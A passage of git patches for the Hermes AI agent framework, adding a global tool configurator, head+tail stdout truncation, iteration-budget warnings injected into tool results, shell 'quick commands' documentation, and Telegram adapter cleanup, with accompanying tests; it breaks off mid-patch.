@@ -481,7 +481,7 @@ def _prompt_toolset_checklist(platform_label: str, enabled: Set[str]) -> Set[str
             while True:
                 stdscr.clear()
                 max_y, max_x = stdscr.getmaxyx()
-                header = f"Tools for {platform_label}  —  ↑↓ navigate, SPACE toggle, ENTER confirm"
+                header = f"Tools for {platform_label}  —  ↑↓ navigate, SPACE toggle, ENTER confirm, ESC cancel"
                 try:
                     stdscr.addnstr(0, 0, header, max_x - 1, curses.A_BOLD | curses.color_pair(2) if curses.has_colors() else curses.A_BOLD)
                 except curses.error:
@@ -941,22 +941,68 @@ def tools_command(args=None, first_install: bool = False, config: dict = None):
         platform_choices.append(f"Configure {pinfo['label']}  ({count}/{total} enabled)")
         platform_keys.append(pkey)
 
+    if len(platform_keys) > 1:
+        platform_choices.append("Configure all platforms (global)")
     platform_choices.append("Reconfigure an existing tool's provider or API key")
     platform_choices.append("Done")
 
+    # Index offsets for the extra options after per-platform entries
+    _global_idx = len(platform_keys) if len(platform_keys) > 1 else -1
+    _reconfig_idx = len(platform_keys) + (1 if len(platform_keys) > 1 else 0)
+    _done_idx = _reconfig_idx + 1
+
     while True:
         idx = _prompt_choice("Select an option:", platform_choices, default=0)
 
         # "Done" selected
-        if idx == len(platform_keys) + 1:
+        if idx == _done_idx:
             break
 
         # "Reconfigure" selected
-        if idx == len(platform_keys):
+        if idx == _reconfig_idx:
             _reconfigure_tool(config)
             print()
             continue
 
+        # "Configure all platforms (global)" selected
+        if idx == _global_idx:
+            # Use the union of all platforms' current tools as the starting state
+            all_current = set()
+            for pk in platform_keys:
+                all_current |= _get_platform_tools(config, pk)
+            new_enabled = _prompt_toolset_checklist("All platforms", all_current)
+            if new_enabled != all_current:
+                for pk in platform_keys:
+                    prev = _get_platform_tools(config, pk)
+                    added = new_enabled - prev
+                    removed = prev - new_enabled
+                    pinfo_inner = PLATFORMS[pk]
+                    if added or removed:
+                        print(color(f"  {pinfo_inner['label']}:", Colors.DIM))
+                        for ts in sorted(added):
+                            label = next((l for k, l, _ in CONFIGURABLE_TOOLSETS if k == ts), ts)
+                            print(color(f"    + {label}", Colors.GREEN))
+                        for ts in sorted(removed):
+                            label = next((l for k, l, _ in CONFIGURABLE_TOOLSETS if k == ts), ts)
+                            print(color(f"    - {label}", Colors.RED))
+                    # Configure API keys for newly enabled tools
+                    for ts_key in sorted(added):
+                        if (TOOL_CATEGORIES.get(ts_key) or TOOLSET_ENV_REQUIREMENTS.get(ts_key)):
+                            if not _toolset_has_keys(ts_key):
+                                _configure_toolset(ts_key, config)
+                    _save_platform_tools(config, pk, new_enabled)
+                save_config(config)
+                print(color("  ✓ Saved configuration for all platforms", Colors.GREEN))
+                # Update choice labels
+                for ci, pk in enumerate(platform_keys):
+                    new_count = len(_get_platform_tools(config, pk))
+                    total = len(CONFIGURABLE_TOOLSETS)
+                    platform_choices[ci] = f"Configure {PLATFORMS[pk]['label']}  ({new_count}/{total} enabled)"
+            else:
+                print(color("  No changes", Colors.DIM))
+            print()
+            continue
+
         pkey = platform_keys[idx]
         pinfo = PLATFORMS[pkey]
 

From a9241f3e3e224408e310efc8594bece627880890 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 00:26:13 -0700
Subject: [PATCH 051/105] fix: head+tail truncation for execute_code stdout

Replaces head-only stdout capture with a two-buffer approach (40% head,
60% tail rolling window) so scripts that print() their final results
at the end never lose them. Adds truncation notice between sections.

Cherry-picked from PR #755, conflict resolved (test file additions).

3 new tests for short output, head+tail preservation, and notice format.
---
 tests/tools/test_code_execution.py | 51 ++++++++++++++++++++++
 tools/code_execution_tool.py       | 69 +++++++++++++++++++++++++++---
 2 files changed, 113 insertions(+), 7 deletions(-)

diff --git a/tests/tools/test_code_execution.py b/tests/tools/test_code_execution.py
index 68ef40ef..22040d76 100644
--- a/tests/tools/test_code_execution.py
+++ b/tests/tools/test_code_execution.py
@@ -743,5 +743,56 @@ class TestInterruptHandling(unittest.TestCase):
             t.join(timeout=3)
 
 
+class TestHeadTailTruncation(unittest.TestCase):
+    """Tests for head+tail truncation of large stdout in execute_code."""
+
+    def _run(self, code):
+        with patch("model_tools.handle_function_call", side_effect=_mock_handle_function_call):
+            result = execute_code(
+                code=code,
+                task_id="test-task",
+                enabled_tools=list(SANDBOX_ALLOWED_TOOLS),
+            )
+        return json.loads(result)
+
+    def test_short_output_not_truncated(self):
+        """Output under MAX_STDOUT_BYTES should not be truncated."""
+        result = self._run('print("small output")')
+        self.assertEqual(result["status"], "success")
+        self.assertIn("small output", result["output"])
+        self.assertNotIn("TRUNCATED", result["output"])
+
+    def test_large_output_preserves_head_and_tail(self):
+        """Output exceeding MAX_STDOUT_BYTES keeps both head and tail."""
+        code = '''
+# Print HEAD marker, then filler, then TAIL marker
+print("HEAD_MARKER_START")
+for i in range(15000):
+    print(f"filler_line_{i:06d}_padding_to_fill_buffer")
+print("TAIL_MARKER_END")
+'''
+        result = self._run(code)
+        self.assertEqual(result["status"], "success")
+        output = result["output"]
+        # Head should be preserved
+        self.assertIn("HEAD_MARKER_START", output)
+        # Tail should be preserved (this is the key improvement)
+        self.assertIn("TAIL_MARKER_END", output)
+        # Truncation notice should be present
+        self.assertIn("TRUNCATED", output)
+
+    def test_truncation_notice_format(self):
+        """Truncation notice includes character counts."""
+        code = '''
+for i in range(15000):
+    print(f"padding_line_{i:06d}_xxxxxxxxxxxxxxxxxxxxxxxxxx")
+'''
+        result = self._run(code)
+        output = result["output"]
+        if "TRUNCATED" in output:
+            self.assertIn("chars omitted", output)
+            self.assertIn("total", output)
+
+
 if __name__ == "__main__":
     unittest.main()
diff --git a/tools/code_execution_tool.py b/tools/code_execution_tool.py
index 76a12dff..b7fac539 100644
--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -458,11 +458,17 @@ def execute_code(
 
         # --- Poll loop: watch for exit, timeout, and interrupt ---
         deadline = time.monotonic() + timeout
-        stdout_chunks: list = []
         stderr_chunks: list = []
 
-        # Background readers to avoid pipe buffer deadlocks
+        # Background readers to avoid pipe buffer deadlocks.
+        # For stdout we use a head+tail strategy: keep the first HEAD_BYTES
+        # and a rolling window of the last TAIL_BYTES so the final print()
+        # output is never lost.  Stderr keeps head-only (errors appear early).
+        _STDOUT_HEAD_BYTES = int(MAX_STDOUT_BYTES * 0.4)   # 40% head
+        _STDOUT_TAIL_BYTES = MAX_STDOUT_BYTES - _STDOUT_HEAD_BYTES  # 60% tail
+
         def _drain(pipe, chunks, max_bytes):
+            """Simple head-only drain (used for stderr)."""
             total = 0
             try:
                 while True:
@@ -476,8 +482,48 @@ def execute_code(
             except (ValueError, OSError) as e:
                 logger.debug("Error reading process output: %s", e, exc_info=True)
 
+        stdout_total_bytes = [0]  # mutable ref for total bytes seen
+
+        def _drain_head_tail(pipe, head_chunks, tail_chunks, head_bytes, tail_bytes, total_ref):
+            """Drain stdout keeping both head and tail data."""
+            head_collected = 0
+            from collections import deque
+            tail_buf = deque()
+            tail_collected = 0
+            try:
+                while True:
+                    data = pipe.read(4096)
+                    if not data:
+                        break
+                    total_ref[0] += len(data)
+                    # Fill head buffer first
+                    if head_collected < head_bytes:
+                        keep = min(len(data), head_bytes - head_collected)
+                        head_chunks.append(data[:keep])
+                        head_collected += keep
+                        data = data[keep:]  # remaining goes to tail
+                        if not data:
+                            continue
+                    # Everything past head goes into rolling tail buffer
+                    tail_buf.append(data)
+                    tail_collected += len(data)
+                    # Evict old tail data to stay within tail_bytes budget
+                    while tail_collected > tail_bytes and tail_buf:
+                        oldest = tail_buf.popleft()
+                        tail_collected -= len(oldest)
+            except (ValueError, OSError):
+                pass
+            # Transfer final tail to output list
+            tail_chunks.extend(tail_buf)
+
+        stdout_head_chunks: list = []
+        stdout_tail_chunks: list = []
+
         stdout_reader = threading.Thread(
-            target=_drain, args=(proc.stdout, stdout_chunks, MAX_STDOUT_BYTES), daemon=True
+            target=_drain_head_tail,
+            args=(proc.stdout, stdout_head_chunks, stdout_tail_chunks,
+                  _STDOUT_HEAD_BYTES, _STDOUT_TAIL_BYTES, stdout_total_bytes),
+            daemon=True
         )
         stderr_reader = threading.Thread(
             target=_drain, args=(proc.stderr, stderr_chunks, MAX_STDERR_BYTES), daemon=True
@@ -501,12 +547,21 @@ def execute_code(
         stdout_reader.join(timeout=3)
         stderr_reader.join(timeout=3)
 
-        stdout_text = b"".join(stdout_chunks).decode("utf-8", errors="replace")
+        stdout_head = b"".join(stdout_head_chunks).decode("utf-8", errors="replace")
+        stdout_tail = b"".join(stdout_tail_chunks).decode("utf-8", errors="replace")
         stderr_text = b"".join(stderr_chunks).decode("utf-8", errors="replace")
 
-        # Truncation notice
-        if len(stdout_text) >= MAX_STDOUT_BYTES:
-            stdout_text = stdout_text[:MAX_STDOUT_BYTES] + "\n[output truncated at 50KB]"
+        # Assemble stdout with head+tail truncation
+        total_stdout = stdout_total_bytes[0]
+        if total_stdout > MAX_STDOUT_BYTES and stdout_tail:
+            omitted = total_stdout - len(stdout_head) - len(stdout_tail)
+            truncated_notice = (
+                f"\n\n... [OUTPUT TRUNCATED - {omitted:,} chars omitted "
+                f"out of {total_stdout:,} total] ...\n\n"
+            )
+            stdout_text = stdout_head + truncated_notice + stdout_tail
+        else:
+            stdout_text = stdout_head + stdout_tail
 
         exit_code = proc.returncode if proc.returncode is not None else -1
         duration = round(time.monotonic() - exec_start, 2)

From c5321298cea497da190bf8f4cb353728cda5e31e Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 00:28:52 -0700
Subject: [PATCH 052/105] docs: add quick commands documentation

Documents the quick_commands config feature from PR #746:
- configuration.md: full section with examples (server status, disk,
  gpu, update), behavior notes (timeout, priority, works everywhere)
- cli.md: brief section with config example + link to config guide
---
 website/docs/user-guide/cli.md           | 17 +++++++++++++++
 website/docs/user-guide/configuration.md | 27 ++++++++++++++++++++++++
 2 files changed, 44 insertions(+)

diff --git a/website/docs/user-guide/cli.md b/website/docs/user-guide/cli.md
index aeeba5f0..f561620e 100644
--- a/website/docs/user-guide/cli.md
+++ b/website/docs/user-guide/cli.md
@@ -131,6 +131,23 @@ Type `/` to see an autocomplete dropdown of all available commands.
 Commands are case-insensitive — `/HELP` works the same as `/help`. Most commands work mid-conversation.
 :::
 
+## Quick Commands
+
+You can define custom commands that run shell commands instantly without invoking the LLM. These work in both the CLI and messaging platforms (Telegram, Discord, etc.).
+
+```yaml
+# ~/.hermes/config.yaml
+quick_commands:
+  status:
+    type: exec
+    command: systemctl status hermes-agent
+  gpu:
+    type: exec
+    command: nvidia-smi --query-gpu=utilization.gpu,memory.used --format=csv,noheader
+```
+
+Then type `/status` or `/gpu` in any chat. See the [Configuration guide](/docs/user-guide/configuration#quick-commands) for more examples.
+
 ## Skill Slash Commands
 
 Every installed skill in `~/.hermes/skills/` is automatically registered as a slash command. The skill name becomes the command:
diff --git a/website/docs/user-guide/configuration.md b/website/docs/user-guide/configuration.md
index 8ca0f072..7be9da3d 100644
--- a/website/docs/user-guide/configuration.md
+++ b/website/docs/user-guide/configuration.md
@@ -632,6 +632,33 @@ stt:
 
 Requires `VOICE_TOOLS_OPENAI_KEY` in `.env` for OpenAI STT.
 
+## Quick Commands
+
+Define custom commands that run shell commands without invoking the LLM — zero token usage, instant execution. Especially useful from messaging platforms (Telegram, Discord, etc.) for quick server checks or utility scripts.
+
+```yaml
+quick_commands:
+  status:
+    type: exec
+    command: systemctl status hermes-agent
+  disk:
+    type: exec
+    command: df -h /
+  update:
+    type: exec
+    command: cd ~/.hermes/hermes-agent && git pull && pip install -e .
+  gpu:
+    type: exec
+    command: nvidia-smi --query-gpu=name,utilization.gpu,memory.used,memory.total --format=csv,noheader
+```
+
+Usage: type `/status`, `/disk`, `/update`, or `/gpu` in the CLI or any messaging platform. The command runs locally on the host and returns the output directly — no LLM call, no tokens consumed.
+
+- **30-second timeout** — long-running commands are killed with an error message
+- **Priority** — quick commands are checked before skill commands, so you can override skill names
+- **Type** — only `exec` is supported (runs a shell command); other types show an error
+- **Works everywhere** — CLI, Telegram, Discord, Slack, WhatsApp, Signal
+
 ## Human Delay
 
 Simulate human-like response pacing in messaging platforms:

From 21ff0d39ad0081f9ca5e1f440993be0390d279cd Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Mon, 9 Mar 2026 05:19:42 -0700
Subject: [PATCH 053/105] feat: iteration budget pressure via tool result
 injection

Two-tier warning system that nudges the LLM as it approaches
max_iterations, injected into the last tool result JSON rather
than as a separate system message:

- Caution (70%): {"_budget_warning": "[BUDGET: 42/60...]"}
- Warning (90%): {"_budget_warning": "[BUDGET WARNING: 54/60...]"}

For JSON tool results, adds a _budget_warning field to the existing
dict. For plain text results, appends the warning as text.

Key properties:
- No system messages injected mid-conversation
- No changes to message structure
- Prompt cache stays valid
- Configurable thresholds (0.7 / 0.9)
- Can be disabled: _budget_pressure_enabled = False

Inspired by PR #421 (@Bartok9) and issue #414.
8 tests covering thresholds, edge cases, JSON and text injection.
---
 run_agent.py            | 56 ++++++++++++++++++++++++++++--
 tests/test_run_agent.py | 75 +++++++++++++++++++++++++++++++++++++++++
 2 files changed, 129 insertions(+), 2 deletions(-)

diff --git a/run_agent.py b/run_agent.py
index eefeb808..57e2a13b 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -297,6 +297,13 @@ class AIAgent:
         self._use_prompt_caching = is_openrouter and is_claude
         self._cache_ttl = "5m"  # Default 5-minute TTL (1.25x write cost)
         
+        # Iteration budget pressure: warn the LLM as it approaches max_iterations.
+        # Warnings are injected into the last tool result JSON (not as separate
+        # messages) so they don't break message structure or invalidate caching.
+        self._budget_caution_threshold = 0.7   # 70% — nudge to start wrapping up
+        self._budget_warning_threshold = 0.9   # 90% — urgent, respond now
+        self._budget_pressure_enabled = True
+
         # Persistent error log -- always writes WARNING+ to ~/.hermes/logs/errors.log
         # so tool failures, API errors, etc. are inspectable after the fact.
         from agent.redact import RedactingFormatter
@@ -2691,7 +2698,7 @@ class AIAgent:
 
         return compressed, new_system_prompt
 
-    def _execute_tool_calls(self, assistant_message, messages: list, effective_task_id: str) -> None:
+    def _execute_tool_calls(self, assistant_message, messages: list, effective_task_id: str, api_call_count: int = 0) -> None:
         """Execute tool calls from the assistant message and append results to messages."""
         for i, tool_call in enumerate(assistant_message.tool_calls, 1):
             # SAFETY: check interrupt BEFORE starting each tool.
@@ -2938,6 +2945,51 @@ class AIAgent:
             if self.tool_delay > 0 and i < len(assistant_message.tool_calls):
                 time.sleep(self.tool_delay)
 
+        # ── Budget pressure injection ─────────────────────────────────
+        # After all tool calls in this turn are processed, check if we're
+        # approaching max_iterations. If so, inject a warning into the LAST
+        # tool result's JSON so the LLM sees it naturally when reading results.
+        budget_warning = self._get_budget_warning(api_call_count)
+        if budget_warning and messages and messages[-1].get("role") == "tool":
+            last_content = messages[-1]["content"]
+            try:
+                parsed = json.loads(last_content)
+                if isinstance(parsed, dict):
+                    parsed["_budget_warning"] = budget_warning
+                    messages[-1]["content"] = json.dumps(parsed, ensure_ascii=False)
+                else:
+                    messages[-1]["content"] = last_content + f"\n\n{budget_warning}"
+            except (json.JSONDecodeError, TypeError):
+                messages[-1]["content"] = last_content + f"\n\n{budget_warning}"
+            if not self.quiet_mode:
+                remaining = self.max_iterations - api_call_count
+                tier = "⚠️  WARNING" if remaining <= self.max_iterations * 0.1 else "💡 CAUTION"
+                print(f"{self.log_prefix}{tier}: {remaining} iterations remaining")
+
+    def _get_budget_warning(self, api_call_count: int) -> Optional[str]:
+        """Return a budget pressure string, or None if not yet needed.
+
+        Two-tier system:
+          - Caution (70%): nudge to consolidate work
+          - Warning (90%): urgent, must respond now
+        """
+        if not self._budget_pressure_enabled or self.max_iterations <= 0:
+            return None
+        progress = api_call_count / self.max_iterations
+        remaining = self.max_iterations - api_call_count
+        if progress >= self._budget_warning_threshold:
+            return (
+                f"[BUDGET WARNING: Iteration {api_call_count}/{self.max_iterations}. "
+                f"Only {remaining} iteration(s) left. "
+                "Provide your final response NOW. No more tool calls unless absolutely critical.]"
+            )
+        if progress >= self._budget_caution_threshold:
+            return (
+                f"[BUDGET: Iteration {api_call_count}/{self.max_iterations}. "
+                f"{remaining} iterations left. Start consolidating your work.]"
+            )
+        return None
+
     def _handle_max_iterations(self, messages: list, api_call_count: int) -> str:
         """Request a summary when max iterations are reached. Returns the final response text."""
         print(f"⚠️  Reached maximum iterations ({self.max_iterations}). Requesting summary...")
@@ -4183,7 +4235,7 @@ class AIAgent:
                     
                     messages.append(assistant_msg)
                     
-                    self._execute_tool_calls(assistant_message, messages, effective_task_id)
+                    self._execute_tool_calls(assistant_message, messages, effective_task_id, api_call_count)
 
                     # Refund the iteration if the ONLY tool(s) called were
                     # execute_code (programmatic tool calling).  These are
diff --git a/tests/test_run_agent.py b/tests/test_run_agent.py
index 5757a782..283498eb 100644
--- a/tests/test_run_agent.py
+++ b/tests/test_run_agent.py
@@ -1208,3 +1208,78 @@ class TestSystemPromptStability:
         conversation_history = []
         should_prefetch = not conversation_history
         assert should_prefetch is True
+
+
+# ---------------------------------------------------------------------------
+# Iteration budget pressure warnings
+# ---------------------------------------------------------------------------
+
+class TestBudgetPressure:
+    """Budget pressure warning system (issue #414)."""
+
+    def test_no_warning_below_caution(self, agent):
+        agent.max_iterations = 60
+        assert agent._get_budget_warning(30) is None
+
+    def test_caution_at_70_percent(self, agent):
+        agent.max_iterations = 60
+        msg = agent._get_budget_warning(42)
+        assert msg is not None
+        assert "[BUDGET:" in msg
+        assert "18 iterations left" in msg
+
+    def test_warning_at_90_percent(self, agent):
+        agent.max_iterations = 60
+        msg = agent._get_budget_warning(54)
+        assert "[BUDGET WARNING:" in msg
+        assert "Provide your final response NOW" in msg
+
+    def test_last_iteration(self, agent):
+        agent.max_iterations = 60
+        msg = agent._get_budget_warning(59)
+        assert "1 iteration(s) left" in msg
+
+    def test_disabled(self, agent):
+        agent.max_iterations = 60
+        agent._budget_pressure_enabled = False
+        assert agent._get_budget_warning(55) is None
+
+    def test_zero_max_iterations(self, agent):
+        agent.max_iterations = 0
+        assert agent._get_budget_warning(0) is None
+
+    def test_injects_into_json_tool_result(self, agent):
+        """Warning should be injected as _budget_warning field in JSON tool results."""
+        import json
+        agent.max_iterations = 10
+        messages = [
+            {"role": "tool", "content": json.dumps({"output": "done", "exit_code": 0}), "tool_call_id": "tc1"}
+        ]
+        warning = agent._get_budget_warning(9)
+        assert warning is not None
+        # Simulate the injection logic
+        last_content = messages[-1]["content"]
+        parsed = json.loads(last_content)
+        parsed["_budget_warning"] = warning
+        messages[-1]["content"] = json.dumps(parsed, ensure_ascii=False)
+        result = json.loads(messages[-1]["content"])
+        assert "_budget_warning" in result
+        assert "BUDGET WARNING" in result["_budget_warning"]
+        assert result["output"] == "done"  # original content preserved
+
+    def test_appends_to_non_json_tool_result(self, agent):
+        """Warning should be appended as text for non-JSON tool results."""
+        agent.max_iterations = 10
+        messages = [
+            {"role": "tool", "content": "plain text result", "tool_call_id": "tc1"}
+        ]
+        warning = agent._get_budget_warning(9)
+        # Simulate injection logic for non-JSON
+        last_content = messages[-1]["content"]
+        try:
+            import json
+            json.loads(last_content)
+        except (json.JSONDecodeError, TypeError):
+            messages[-1]["content"] = last_content + f"\n\n{warning}"
+        assert "plain text result" in messages[-1]["content"]
+        assert "BUDGET WARNING" in messages[-1]["content"]

From aead9c8eadaa3fbe0187520bf2c5943c779e035f Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 00:37:45 -0700
Subject: [PATCH 054/105] chore: remove unnecessary pragma comments from
 Telegram adapter
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Strip 18 '# pragma: no cover - defensive logging' annotations — these
are real code paths, not worth excluding from coverage.
---
 gateway/platforms/telegram.py | 36 +++++++++++++++++------------------
 1 file changed, 18 insertions(+), 18 deletions(-)

diff --git a/gateway/platforms/telegram.py b/gateway/platforms/telegram.py
index 5b26058e..76a22c4f 100644
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -175,7 +175,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     BotCommand("reload_mcp", "Reload MCP servers from config"),
                     BotCommand("help", "Show available commands"),
                 ])
-            except Exception as e:  # pragma: no cover - defensive logging
+            except Exception as e:
                 logger.warning(
                     "[%s] Could not register Telegram command menu: %s",
                     self.name,
@@ -187,7 +187,7 @@ class TelegramAdapter(BasePlatformAdapter):
             logger.info("[%s] Connected and polling for Telegram updates", self.name)
             return True
             
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.error("[%s] Failed to connect to Telegram: %s", self.name, e, exc_info=True)
             return False
     
@@ -198,7 +198,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 await self._app.updater.stop()
                 await self._app.stop()
                 await self._app.shutdown()
-            except Exception as e:  # pragma: no cover - defensive logging
+            except Exception as e:
                 logger.warning("[%s] Error during Telegram disconnect: %s", self.name, e, exc_info=True)
         
         self._running = False
@@ -259,7 +259,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 raw_response={"message_ids": message_ids}
             )
             
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.error("[%s] Failed to send Telegram message: %s", self.name, e, exc_info=True)
             return SendResult(success=False, error=str(e))
 
@@ -281,7 +281,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     text=formatted,
                     parse_mode=ParseMode.MARKDOWN_V2,
                 )
-            except Exception:  # pragma: no cover - defensive logging
+            except Exception:
                 # Fallback: retry without markdown formatting
                 await self._bot.edit_message_text(
                     chat_id=int(chat_id),
@@ -289,7 +289,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     text=content,
                 )
             return SendResult(success=True, message_id=message_id)
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.error(
                 "[%s] Failed to edit Telegram message %s: %s",
                 self.name,
@@ -338,7 +338,7 @@ class TelegramAdapter(BasePlatformAdapter):
                         message_thread_id=int(_audio_thread) if _audio_thread else None,
                     )
             return SendResult(success=True, message_id=str(msg.message_id))
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.error(
                 "[%s] Failed to send Telegram voice/audio, falling back to base adapter: %s",
                 self.name,
@@ -371,7 +371,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     reply_to_message_id=int(reply_to) if reply_to else None,
                 )
             return SendResult(success=True, message_id=str(msg.message_id))
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.error(
                 "[%s] Failed to send Telegram local image, falling back to base adapter: %s",
                 self.name,
@@ -429,7 +429,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     reply_to_message_id=int(reply_to) if reply_to else None,
                 )
                 return SendResult(success=True, message_id=str(msg.message_id))
-            except Exception as e2:  # pragma: no cover - defensive logging
+            except Exception as e2:
                 logger.error(
                     "[%s] File upload send_photo also failed: %s",
                     self.name,
@@ -461,7 +461,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 message_thread_id=int(_anim_thread) if _anim_thread else None,
             )
             return SendResult(success=True, message_id=str(msg.message_id))
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.error(
                 "[%s] Failed to send Telegram animation, falling back to photo: %s",
                 self.name,
@@ -481,7 +481,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     action="typing",
                     message_thread_id=int(_typing_thread) if _typing_thread else None,
                 )
-            except Exception as e:  # pragma: no cover - defensive logging
+            except Exception as e:
                 # Typing failures are non-fatal; log at debug level only.
                 logger.debug(
                     "[%s] Failed to send Telegram typing indicator: %s",
@@ -514,7 +514,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 "username": chat.username,
                 "is_forum": getattr(chat, "is_forum", False),
             }
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.error(
                 "[%s] Failed to get Telegram chat info for %s: %s",
                 self.name,
@@ -711,7 +711,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 event.media_urls = [cached_path]
                 event.media_types = [f"image/{ext.lstrip('.')}"]
                 logger.info("[Telegram] Cached user photo at %s", cached_path)
-            except Exception as e:  # pragma: no cover - defensive logging
+            except Exception as e:
                 logger.warning("[Telegram] Failed to cache photo: %s", e, exc_info=True)
         
         # Download voice/audio messages to cache for STT transcription
@@ -723,7 +723,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 event.media_urls = [cached_path]
                 event.media_types = ["audio/ogg"]
                 logger.info("[Telegram] Cached user voice at %s", cached_path)
-            except Exception as e:  # pragma: no cover - defensive logging
+            except Exception as e:
                 logger.warning("[Telegram] Failed to cache voice: %s", e, exc_info=True)
         elif msg.audio:
             try:
@@ -733,7 +733,7 @@ class TelegramAdapter(BasePlatformAdapter):
                 event.media_urls = [cached_path]
                 event.media_types = ["audio/mp3"]
                 logger.info("[Telegram] Cached user audio at %s", cached_path)
-            except Exception as e:  # pragma: no cover - defensive logging
+            except Exception as e:
                 logger.warning("[Telegram] Failed to cache audio: %s", e, exc_info=True)
 
         # Download document files to cache for agent processing
@@ -796,13 +796,13 @@ class TelegramAdapter(BasePlatformAdapter):
                             event.text = f"{injection}\n\n{event.text}"
                         else:
                             event.text = injection
-                    except UnicodeDecodeError:  # pragma: no cover - defensive logging
+                    except UnicodeDecodeError:
                         logger.warning(
                             "[Telegram] Could not decode text file as UTF-8, skipping content injection",
                             exc_info=True,
                         )
 
-            except Exception as e:  # pragma: no cover - defensive logging
+            except Exception as e:
                 logger.warning("[Telegram] Failed to cache document: %s", e, exc_info=True)
 
         await self.handle_message(event)
@@ -867,7 +867,7 @@ class TelegramAdapter(BasePlatformAdapter):
                     f"a sticker with emoji {emoji}" if emoji else "a sticker",
                     emoji, set_name,
                 )
-        except Exception as e:  # pragma: no cover - defensive logging
+        except Exception as e:
             logger.warning("[Telegram] Sticker analysis error: %s", e, exc_info=True)
             event.text = build_sticker_injection(
                 f"a sticker with emoji {emoji}" if emoji else "a sticker",

From 2e1aa1b4241a1a0a567c0808aab20fea54ae81f7 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 00:40:44 -0700
Subject: [PATCH 055/105] docs: add iteration budget pressure section to
 configuration guide

Documents the two-tier budget warning system from PR #762:
- Explains caution (70%) and warning (90%) thresholds
- Table showing what the model sees at each tier
- Notes on how injection preserves prompt caching
- Links to max_turns config
---
 website/docs/user-guide/configuration.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/website/docs/user-guide/configuration.md b/website/docs/user-guide/configuration.md
index 7be9da3d..f9e72ea7 100644
--- a/website/docs/user-guide/configuration.md
+++ b/website/docs/user-guide/configuration.md
@@ -471,6 +471,24 @@ compression:
 
 The `summary_model` must support a context length at least as large as your main model's, since it receives the full middle section of the conversation for compression.
 
+## Iteration Budget Pressure
+
+When the agent is working on a complex task with many tool calls, it can burn through its iteration budget (default: 90 turns) without realizing it's running low. Budget pressure automatically warns the model as it approaches the limit:
+
+| Threshold | Level | What the model sees |
+|-----------|-------|---------------------|
+| **70%** | Caution | `[BUDGET: 63/90. 27 iterations left. Start consolidating.]` |
+| **90%** | Warning | `[BUDGET WARNING: 81/90. Only 9 left. Respond NOW.]` |
+
+Warnings are injected into the last tool result's JSON (as a `_budget_warning` field) rather than as separate messages — this preserves prompt caching and doesn't disrupt the conversation structure.
+
+```yaml
+agent:
+  max_turns: 90                # Max iterations per conversation turn (default: 90)
+```
+
+Budget pressure is enabled by default. The agent sees warnings naturally as part of tool results, encouraging it to consolidate its work and deliver a response before running out of iterations.
+
 ## Auxiliary Models
 
 Hermes uses lightweight "auxiliary" models for side tasks like image analysis, web page summarization, and browser screenshot analysis. By default, these use **Gemini Flash** via OpenRouter or Nous Portal — you don't need to configure anything.

From 331af8df23e443fa2eed0605e08d1ff2c4efc9a7 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 00:47:26 -0700
Subject: [PATCH 056/105] fix: clean up tools --summary output and type
 annotations

- Use Optional[List[str]] instead of List[str] | None (consistency)
- Add header, per-platform counts, and checkmark list format
- Matches the visual style of the interactive configurator
---
 hermes_cli/tools_config.py | 20 +++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)

diff --git a/hermes_cli/tools_config.py b/hermes_cli/tools_config.py
index 88a1d0b4..5632327e 100644
--- a/hermes_cli/tools_config.py
+++ b/hermes_cli/tools_config.py
@@ -11,7 +11,7 @@ the `platform_toolsets` key.
 
 import sys
 from pathlib import Path
-from typing import Dict, List, Set
+from typing import Dict, List, Optional, Set
 
 import os
 
@@ -308,7 +308,7 @@ def _get_enabled_platforms() -> List[str]:
     return enabled
 
 
-def _platform_toolset_summary(config: dict, platforms: List[str] | None = None) -> Dict[str, Set[str]]:
+def _platform_toolset_summary(config: dict, platforms: Optional[List[str]] = None) -> Dict[str, Set[str]]:
     """Return a summary of enabled toolsets per platform.
 
     When ``platforms`` is None, this uses ``_get_enabled_platforms`` to
@@ -893,19 +893,21 @@ def tools_command(args=None, first_install: bool = False, config: dict = None):
 
     # Non-interactive summary mode for CLI usage
     if getattr(args, "summary", False):
+        total = len(CONFIGURABLE_TOOLSETS)
+        print(color("⚕ Tool Summary", Colors.CYAN, Colors.BOLD))
+        print()
         summary = _platform_toolset_summary(config, enabled_platforms)
         for pkey in enabled_platforms:
             pinfo = PLATFORMS[pkey]
             enabled = summary.get(pkey, set())
-            if not enabled:
-                enabled_label = "none"
-            else:
-                labels = []
+            count = len(enabled)
